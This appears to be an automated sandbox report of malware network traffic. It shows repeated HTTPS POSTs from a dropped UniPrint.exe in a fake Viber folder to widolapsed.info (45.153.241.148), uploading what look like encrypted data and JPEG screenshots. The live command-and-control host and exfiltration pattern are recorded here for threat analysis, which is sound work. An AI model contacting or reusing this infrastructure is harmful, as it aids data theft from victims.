                                                                                                      2021-09-15 11:45:23 UTC64OUTData Raw: 2e 68 cd 25 14 00 ec d1 4d a5 a2 e1 61 68 cd 26 69 33 45 c2 c3 b3 46 69 b9 a2 8b 85 87 e6 8c d3 68 cd 3b 8a c3 b3 49 9a 6d 2e 69 5c 76 17 34 b9 a6 d2 66 8b 85 87 51 9a 4c d1 45 c2 c3 b3 48 69 28 cd 3b 85 82 8a 4a 29 00 b4 66 92 8a 02 c2 e6 8a 6e 68 cd 2b 8e c2 d1 9a 6e 68 cd 17 0b 0b 9a 33 49 9a 4c d2 b8 ec 3b 34 94 99 a3 34 5c 2c 2d 14 99 a3 34 80 5c d2 52 66 90 9a 2e 3b 0b 9a 4c d2 51 4a e3 b0 b4 94 52 50 31 4d 25 14 52 01 69 28 a2 80 0a 28 a2 80 1c 0d 19 a6 e6 8c d3 b8 58 5c d1 49 49 48 2c 2d 06 8c d2 52 18 50 28 a2 80 16 8a 29 29 88 82 8a 29 6b 23 50 a2 ad e9 9a 65 ee ab 70 f0 69 f0 79 d2 22 17 65 dc 17 0b 90 33 c9 1e a2 b4 bf e1 0e f1 01 ff 00 98 7f fe 46 8f ff 00 8a a8 95 58 45 da 4d 22 94 64 f6 46 15 15 bd ff 00 08 67 88 4f fc c3 ff 00 f2 34 7f fc
                                                                                                      Data Ascii: .h%Mah&i3EFih;Im.i\v4fQLEHi(;J)fnh+nh3IL;44\,-4\Rf.;LQJRP1M%Ri((X\IIH,-RP()))k#Pepiy"e3FXEM"dFgO4
                                                                                                      2021-09-15 11:45:23 UTC74OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 32 35 39 39 33 37 32 30 37 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3259937207--
                                                                                                      2021-09-15 11:45:23 UTC74INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:23 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=de80600dc92f141ee3da10fe6bf05f4a0734f2904d555e3f118b82595cba32d2; expires=Thu, 15-Sep-2022 11:45:23 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:23 UTC75INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      1192.168.2.34975345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:25 UTC75OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76426
                                                                                                      Content-Type: multipart/form-data; boundary=--------974736809
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:25 UTC75OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 37 34 37 33 36 38 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------974736809Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:25 UTC75OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 b4 d1 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:45:25 UTC75OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:25 UTC91OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:25 UTC107OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:25 UTC123OUTData Raw: c2 7f e9 90 fe 75 51 8b 5b 82 9a 94 b4 38 ba 28 ad cb c2 90 f8 5f 4e 31 cb a7 c6 f3 42 e5 e3 7b 50 d3 4a 7c d6 19 0f b0 e3 00 7f 78 74 ae 06 ed 63 d7 4a e6 25 28 66 55 60 ac 40 61 86 00 f5 ef 5d 56 a9 05 bc 9e 28 9a d4 9b 09 6d ed cc d2 0b 6b 6b 6f 29 86 c4 2c 11 d8 22 e7 38 c7 04 f7 aa b6 ca fa 84 76 92 5c 2e 98 f1 de 19 ad d3 ec f6 c2 37 8e 52 80 a8 38 45 07 07 6e 08 cf 53 cd 47 b5 56 b9 5e cd dc e7 d5 99 18 32 92 ac 39 04 1e 45 4d 77 7b 75 7c c8 d7 97 12 4e d1 ae c5 69 1b 71 0b 9c e3 27 eb 5d 02 d9 5a c7 6f 6d 37 d9 e2 27 4d 85 cd e0 65 07 7b 98 c4 88 1b d7 e7 62 bf 85 53 b8 89 13 c3 8b aa 0b 44 13 ce 89 03 2e c5 da 8b 92 3c d0 3b 16 db b7 38 ea 18 e7 91 4f da 2b d8 14 19 89 45 74 17 90 5b ae af e2 65 58 21 11 c1 13 18 80 41 84 3e 6a 01 b7 d3 82 47 1e
                                                                                                      Data Ascii: uQ[8(_N1B{PJ|xtcJ%(fU`@a]V(mkko),"8v\.7R8EnSGV^29EMw{u|Niq']Zom7'Me{bSD.<;8O+Et[eX!A>jG
                                                                                                      2021-09-15 11:45:25 UTC139OUTData Raw: 45 36 96 8b 85 85 a3 34 99 a4 cd 17 0b 0e cd 19 a6 e6 8a 2e 16 1f 9a 33 4d a3 34 ee 2b 0e cd 26 69 b4 b9 a5 71 d8 5c d2 e6 9b 49 9a 2e 16 1d 46 69 33 45 17 0b 0e cd 21 a4 a3 34 ee 16 0a 29 28 a4 02 d1 9a 4a 28 0b 0b 9a 29 b9 a3 34 ae 3b 0b 46 69 b9 a3 34 5c 2c 2e 68 cd 26 69 33 4a e3 b0 ec d2 52 66 8c d1 70 b0 b4 52 66 8c d2 01 73 49 49 9a 42 68 b8 ec 2e 69 33 49 45 2b 8e c2 d2 51 49 40 c5 34 94 51 48 05 a4 a2 8a 00 28 a2 8a 00 70 34 66 9b 9a 33 4e e1 61 73 45 25 25 20 b0 b4 1a 33 49 48 61 40 a2 8a 00 5a 28 a4 a6 22 0a 28 a5 ac 8d 42 8a b7 a6 69 97 ba ad c3 c1 a7 c1 e7 48 88 5d 97 70 5c 2e 40 cf 24 7a 8a d2 ff 00 84 3b c4 07 fe 61 ff 00 f9 1a 3f fe 2a a2 55 61 17 69 34 8a 51 93 d9 18 54 56 f7 fc 21 9e 21 3f f3 0f ff 00 c8 d1 ff 00 f1 55 05 ff 00 86 35 ad
                                                                                                      Data Ascii: E64.3M4+&iq\I.Fi3E!4)(J()4;Fi4\,.h&i3JRfpRfsIIBh.i3IE+QI@4QH(p4f3NasE%% 3IHa@Z("(BiH]p\.@$z;a?*Uai4QTV!!?U5
                                                                                                      2021-09-15 11:45:25 UTC150OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 37 34 37 33 36 38 30 39 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------974736809--
                                                                                                      2021-09-15 11:45:26 UTC150INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:25 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=bded72cc5c7f2e575f605fb39a97e546a831d014bb37e8828c9704ca34d93734; expires=Thu, 15-Sep-2022 11:45:25 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:26 UTC150INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      10192.168.2.34976345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:35 UTC797OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 81307
                                                                                                      Content-Type: multipart/form-data; boundary=--------2963325791
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:35 UTC797OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 39 36 33 33 32 35 37 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2963325791Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:35 UTC797OUTData Raw: 59 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 53 c4 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee ca 9a 10 4e 0f 72 10 20 82 3b 3c 54 aa 1e 5f ee c8 ff 2a 88 63 f3 be db 5f c5 c6 3d 26 b3 58 91 09 97 15 60 fe 43 e5 1b 64 51 4d
                                                                                                      Data Ascii: YiPS4\DB.${OweS0E_J4f,?:M2gA[DNr ;<T_*c_=&X`CdQM
                                                                                                      2021-09-15 11:45:35 UTC797OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:35 UTC813OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:35 UTC829OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:35 UTC845OUTData Raw: 9a ad e2 42 45 ea e0 ff 00 0d 62 f5 ef 58 50 a1 cd 04 db 27 13 8c e4 a8 e2 a2 74 07 53 d3 d3 ee 44 4d 30 eb 91 2f fa bb 71 58 54 56 eb 0b 0e a7 23 c7 d5 e8 6c 36 bf 37 f0 46 a2 a0 7d 66 ed ba 36 3e 95 9d 45 52 c3 d3 5d 0c 9e 2e b3 ea 5b 6d 42 e5 fe f4 ad f9 d3 7c e9 1b ab 93 f8 d5 7a 72 d5 fb 38 ad 91 2a b4 de ec 97 71 3d 49 a5 cd 34 52 d2 b1 6a 4d 8e a7 0a 6e 69 73 48 b4 c7 66 9c 0d 47 4f 14 9a 29 31 f4 a2 9a 29 6a 4d 13 1d 4e 14 c0 69 d9 14 8a 4c 76 69 c2 99 9a 5c 9a 96 8b 4c 92 8a 68 26 97 ea 69 34 52 63 c5 2e 45 47 bd 07 56 1f 9d 31 ae 60 4e ae 0d 2e 56 1c e9 75 2c 83 f2 9f a5 71 9e 28 ff 00 8f d8 bf eb 90 ae 98 ea 50 2e 40 c9 ae 67 c4 a7 37 70 9f fa 64 3f 9d 54 62 d6 e0 a6 a5 2d 0e 2e 8a 2b 72 f0 a4 3e 17 d3 8c 72 e9 f1 bc d0 b9 78 de d4 34 d2 9f 35
                                                                                                      Data Ascii: BEbXP'tSDM0/qXTV#l67F}f6>ER].[mB|zr8*q=I4RjMnisHfGO)1)jMNiLvi\Lh&i4Rc.EGV1`N.Vu,q(P.@g7pd?Tb-.+r>rx45
                                                                                                      2021-09-15 11:45:35 UTC861OUTData Raw: 1c eb fa 4c b9 45 53 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 79 9a 9f fc fa 5a 7f e0 53 7f f1 ba 39 1f f4 d0 73 af e9 32 e5 15 4f cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 e4 7f d3 41 ce bf a4 cb 94 55 3f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 91 ff 00 4d 07 3a fe 93 2e 51 54 fc cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8e 47 fd 34 1c eb fa 4c b9 45 53 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 79 9a 9f fc fa 5a 7f e0 53 7f f1 ba 39 1f f4 d0 73 af e9 32 e5 15 4f cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 e4 7f d3 41 ce bf a4 cb 94 55 3f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 4c 96 ee fa 00 8f 3d a5
                                                                                                      Data Ascii: LES5?tyZS9s2OjiMAU?3SKOo7G7M:.QTO}-?)f>nG4LES5?tyZS9s2OjiMAU?3SKOo7L=
                                                                                                      2021-09-15 11:45:35 UTC876OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 39 36 33 33 32 35 37 39 31 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2963325791--
                                                                                                      2021-09-15 11:45:36 UTC876INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:35 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=0177b2f0d50c47965112384af772a4e79e63ae85d66bbd6fd460747d9ae09620; expires=Thu, 15-Sep-2022 11:45:36 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:36 UTC877INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      11192.168.2.34976445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:37 UTC877OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 85135
                                                                                                      Content-Type: multipart/form-data; boundary=--------2571491142
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:37 UTC877OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 35 37 31 34 39 31 31 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2571491142Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:37 UTC877OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 4d b3 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${OweM0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:45:37 UTC877OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:37 UTC893OUTData Raw: ff 00 df 25 47 e1 52 4d 15 d2 eb b7 fa a4 db ff 00 b2 64 82 50 93 74 8a 48 8a 11 1c 6a 7a 13 9d a3 68 e4 11 ec 6b 96 f2 d7 d2 8d 8b e9 4b d9 3b 6f fd 31 fb 55 d8 bd 16 91 a8 3e c0 2d f2 5c c4 07 ce bc 99 46 53 bf 7f d3 be 2a 9b 29 56 2a c3 05 4e 08 a6 79 6b 4e 03 03 02 b5 49 f5 33 76 e8 14 52 d2 55 12 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 28 a2 81 05 14 51 40 05 14 52 d0 02 51 4b 49 40 0a 29 68 a2 98 82 b6 3c 37 0f 9e da a4 5f 66 b8 ba dd 62 7f 73 6e 70 ed fb c8 fa 7c ad fc 8d 63 d2 32 86 eb 53 25 74 d1 51 76 69 9b a3 4c 8e 3d 26 e2 69 b4 d9 e0 ba 88 b8 8e 19 99 b7 bc 79 5c c8 c3 8c 98 f3 d8 00 73 9c 7c ad 9b 43 4a b7 fe de 82 ce 5d 31 a2 b0 25 bc 8b 90 5c 9b dc 21 29 86 2c 14 ee 38 e1 76 f5 c6 45 72 de 5a 9e a2 97 cb 5c 63 15 1c 92 ee 5f 3c 6d b1 d1 ea
